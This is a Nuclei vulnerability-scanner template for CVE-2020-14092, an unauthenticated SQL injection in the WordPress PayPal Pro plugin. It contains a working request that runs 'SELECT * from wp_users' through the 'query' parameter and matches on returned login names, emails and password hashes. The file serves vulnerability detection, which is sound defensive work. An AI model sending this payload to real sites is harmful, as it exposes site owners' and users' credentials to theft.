nuclei-templates/cves/2020/CVE-2020-14092.yaml

44 lines
1.2 KiB
YAML

id: CVE-2020-14092
info:
name: WordPress PayPal Pro <1.1.65 - SQL Injection
author: princechaddha
severity: critical
description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
reference:
- https://wpscan.com/vulnerability/10287
- https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro
- https://nvd.nist.gov/vuln/detail/CVE-2020-14092
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14092
cwe-id: CWE-89
tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/05